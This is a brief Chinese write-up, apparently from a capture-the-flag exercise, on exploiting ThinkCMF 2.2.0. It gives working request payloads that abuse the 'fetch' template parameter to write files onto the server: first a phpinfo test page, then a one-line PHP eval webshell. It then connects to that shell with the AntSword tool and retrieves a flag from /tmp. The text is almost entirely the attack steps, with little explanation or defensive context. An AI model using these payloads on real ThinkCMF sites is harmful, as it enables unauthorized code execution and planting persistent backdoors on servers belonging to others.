ThinkCMF 2.2.0框架漏洞
访问可以看到下面
访问README.md,测试漏洞是否存在,这里是存在的。
我们先写一个phpinfo语句,看能否实现上传文件
?a=fetch&templateFile=public/index&prefix=‘’&content=file_put_contents(‘shell.php’,‘<?php phpinfo(); ?>’)
在访问一下shell.php
/shell.php
写入一个一句话木马,并执行。
/?a=fetch&templateFile=public/index&prefix=‘’&content=file_put_contents(‘shell.php’,‘<?php @eval($_POST[111]); ?>’)
用蚁剑连接一下
在tmp目录下可以找到flag